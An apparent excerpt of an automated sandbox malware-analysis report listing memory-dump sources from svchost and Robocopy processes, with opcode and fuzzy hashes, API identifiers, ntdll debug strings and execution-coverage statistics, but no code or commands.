                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                                                                              • Instruction ID: 6efa049e2cd7bab178828c8ec39d47d2b40bb7367f216bd2368c40e8e80b6f1e
                                                                                                                                                                              • Opcode Fuzzy Hash: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                                                                              • Instruction Fuzzy Hash: CF90022160640802E140B2589458746005687D0301F95D011A0424558DC7598B5566A1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                                                                              • Instruction ID: 0ce7ff1fb4659e164e958a89da5dfcfd2d098133f1c4fb30ba6b3343c487472b
                                                                                                                                                                              • Opcode Fuzzy Hash: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                                                                              • Instruction Fuzzy Hash: F190023120240803E100B2589548747004687D0301F95D411A082455CDD75689516121
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                              • Instruction ID: aa0057e010792f307a6ad3e6794302dc3919de950015b0dfa45c354223d9da06
                                                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                              • Opcode ID: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                                                                              • Instruction ID: 3dd43c5e8df5d4a541ff5e8d49eaa179178be37ac947891ec34abaa15eb6841b
                                                                                                                                                                              • Opcode Fuzzy Hash: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                                                                              • Instruction Fuzzy Hash: 8851E9B5F02556BFCB60DBAC889057EF7FCBB48200B188569E4A5D7681D234DE40CBA4
                                                                                                                                                                              Strings
                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030A4725
                                                                                                                                                                              • ExecuteOptions, xrefs: 030A46A0
                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 030A4787
                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030A46FC
                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030A4655
                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030A4742
                                                                                                                                                                              • Execute=1, xrefs: 030A4713
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                                              • Opcode ID: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                                                                              • Instruction ID: 78dcd32c70aaf640c9cab70d964d0d71dc444305b0533e176ea2e15831aeb794
                                                                                                                                                                              • Opcode Fuzzy Hash: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                                                                              • Instruction Fuzzy Hash: 16511B35A023197ADF25EBA9EC45FEE73B8EF44704F0404A9E505AB191D7B09A41CF51
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction ID: f5ceeaa8e5a1b03da3c5f7c22b5059c6b783afc11a4e2b0d857a0c3f76189cf8
                                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction Fuzzy Hash: 4081AE70E072499FDF64CE68C8917FEBBF5AF45310F1C865AD861AB390C6349941CB58
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030A02E7
                                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030A02BD
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 030A031E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                                              • Opcode ID: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                                                                              • Instruction ID: 2db8c7809eccb387bbab7755e55e440a5e1c3268c69996faf324d820e075a062
                                                                                                                                                                              • Opcode Fuzzy Hash: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                                                                              • Instruction Fuzzy Hash: 7BE1CD35606B46DFD764CF28C884B6BB7E4BB88314F184A6DF8A58B2D0D778D844CB42
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 030A7B8E
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 030A7BAC
                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030A7B7F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                                              • Opcode ID: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                                                                              • Instruction ID: 5c68524538c811c45ac33e6c267ec5267953106bd79f41ab44d2f7c244cb31fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                                                                              • Instruction Fuzzy Hash: DD4126757027029FC724DF6ACC40B6AB7E9EF88710F044A2DF85ADB290DB71E4058B91
                                                                                                                                                                              APIs
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030A728C
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 030A72A3
                                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030A7294
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 030A72C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                                              • Opcode ID: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                                                                              • Instruction ID: 1a106c665ac3f352fff669199b654399dcfb32c0e85686191612411cfb348299
                                                                                                                                                                              • Opcode Fuzzy Hash: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                                                                              • Instruction Fuzzy Hash: 6041F275702706ABC720DEA9CC41BAAB7E5FF84B10F148A29F855EB640DB21E81287D1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction ID: abd2e0749aab9e49970beb63c65aea8394311e1fb8954c30f016bce8e0254830
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction Fuzzy Hash: 3691D670E0220A9BDF64DF69C9857BEB7F5FF44BA0F18851AE865E72C0D73089418768
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$@
                                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                                              • Opcode ID: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                                                                              • Instruction ID: f95edb3e29bdc727553f147ea92e2464b4e180261d036fb99a993f21c44497c0
                                                                                                                                                                              • Opcode Fuzzy Hash: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                                                                              • Instruction Fuzzy Hash: 14813876D01269EBDB35DF54CC44BEEB7B8AB48710F0445EAA919B7280D7709E80CFA0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3.2%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                              Signature Coverage:1.6%
                                                                                                                                                                              Total number of Nodes:441
                                                                                                                                                                              Total number of Limit Nodes:70
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 317411a39b98f3851d3446eb5676ef91fba4d37d9b90158baa9cc3cc12fcb902
                                                                                                                                                                              • Instruction ID: e68b296dd4382630a20f665271b12abcb0714ad7cf2137366b808dc541e87d5b
                                                                                                                                                                              • Opcode Fuzzy Hash: 317411a39b98f3851d3446eb5676ef91fba4d37d9b90158baa9cc3cc12fcb902
                                                                                                                                                                              • Instruction Fuzzy Hash: 99900265601504466140B158480440660059BE1305395C615A1559564C8658D999926A
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: a7fbc93535842c48719626da8dd854f676911582d8746a763ef65f61894d98c1
                                                                                                                                                                              • Instruction ID: 5cbd66af30ccd0b7f0f0973e24a9335e4247d5b54215cef3f538299009cd1bae
                                                                                                                                                                              • Opcode Fuzzy Hash: a7fbc93535842c48719626da8dd854f676911582d8746a763ef65f61894d98c1
                                                                                                                                                                              • Instruction Fuzzy Hash: E090023560580416B140B158488454640059BE0305B55C511E1429558C8A54DA9A5362
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 3086a3533f5b286fb0ca226fccdb9830d85b116012aa75c71f8d2f12a61092e1
                                                                                                                                                                              • Instruction ID: d03079f8ece75e93229b1aeadf1e9d2e748a32ce6a58ceadecadf88ab60d20be
                                                                                                                                                                              • Opcode Fuzzy Hash: 3086a3533f5b286fb0ca226fccdb9830d85b116012aa75c71f8d2f12a61092e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E90023520140806F100B598540864600058BE0305F55D511A6029559EC6A5D9D56132
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 628e40801f86392a0107f69f520dee8ee6521dfc7d4099303f0c26469042d94a
                                                                                                                                                                              • Instruction ID: bc50db81fa1ad03b3038eaf5f77035936f943567939979e375a1eda6ea30628b
                                                                                                                                                                              • Opcode Fuzzy Hash: 628e40801f86392a0107f69f520dee8ee6521dfc7d4099303f0c26469042d94a
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C90023520140C46F100B1584404B4600058BE0305F55C516A1129658D8655D9957522
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: e7f75b2064e98ab617fb25992f6434d87be5c5fcfc9f3e2d5db7a11a13f828ec
                                                                                                                                                                              • Instruction ID: b17e7068bc2388dec22e595ca14a8a083bbdd610ec3de6666ed2e3b460445f57
                                                                                                                                                                              • Opcode Fuzzy Hash: e7f75b2064e98ab617fb25992f6434d87be5c5fcfc9f3e2d5db7a11a13f828ec
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F90023520148C06F110B158840474A00058BD0305F59C911A542965CD86D5D9D57122
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: b89d6ce8b93be32b8541f52c87364400106b13dd85a78f9053328096f71854f9
                                                                                                                                                                              • Instruction ID: cc932a090e38df263d9a15b0988b4ffa77f2641318e02473e8616992cdec7d13
                                                                                                                                                                              • Opcode Fuzzy Hash: b89d6ce8b93be32b8541f52c87364400106b13dd85a78f9053328096f71854f9
                                                                                                                                                                              • Instruction Fuzzy Hash: 1B900225242445567545F158440450740069BE0245795C512A2419954C8566E99AD622
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 0bd4dcd923a0c089be3931ff0bc9a9ac1e58d40b5c012cd706fbe386b0818050
                                                                                                                                                                              • Instruction ID: 4c65e660b0988e997098a0e0d270678f835091f85af32ee85ba11930ebcfbf3e
                                                                                                                                                                              • Opcode Fuzzy Hash: 0bd4dcd923a0c089be3931ff0bc9a9ac1e58d40b5c012cd706fbe386b0818050
                                                                                                                                                                              • Instruction Fuzzy Hash: B190023520140817F111B158450470700098BD0245F95C912A142955CD9696DA96A122
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: a0f67f53a989817d37c18e19283f6f79ffd680f11e9b7d4e17733becddeb42a9
                                                                                                                                                                              • Instruction ID: c288de831e6fa83c3a9a457ab88031280fc0a90a2d2fd7f74651664166c0dac6
                                                                                                                                                                              • Opcode Fuzzy Hash: a0f67f53a989817d37c18e19283f6f79ffd680f11e9b7d4e17733becddeb42a9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0290022D21340406F180B158540860A00058BD1206F95D915A101A55CCC955D9AD5322
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
• Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
• Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0